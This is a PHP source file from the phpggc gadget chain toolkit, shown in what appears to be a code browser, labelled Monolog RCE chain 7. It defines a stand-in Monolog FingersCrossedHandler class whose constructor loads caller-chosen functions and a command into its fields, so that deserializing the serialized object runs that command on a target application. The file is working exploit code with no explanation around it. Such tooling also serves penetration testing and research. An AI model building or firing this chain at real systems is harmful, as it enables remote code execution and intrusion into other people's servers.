Codebase list phpggc / 025c3b80-b35a-421f-bc14-3af504ba5483/upstream gadgetchains / Monolog / RCE / 7 / gadgets.php
025c3b80-b35a-421f-bc14-3af504ba5483/upstream

Tree @025c3b80-b35a-421f-bc14-3af504ba5483/upstream (Download .tar.gz)

gadgets.php @025c3b80-b35a-421f-bc14-3af504ba5483/upstreamraw · history · blame

<?php
namespace Monolog\Handler
{
    class FingersCrossedHandler
    {
    	protected $passthruLevel = 0;
        protected $handler;
        protected $buffer;
        protected $processors;
        
        function __construct($methods,$command)
        {
            $this->processors = $methods;
            $this->buffer = [$command];
            $this->handler = $this;
        }
    }
}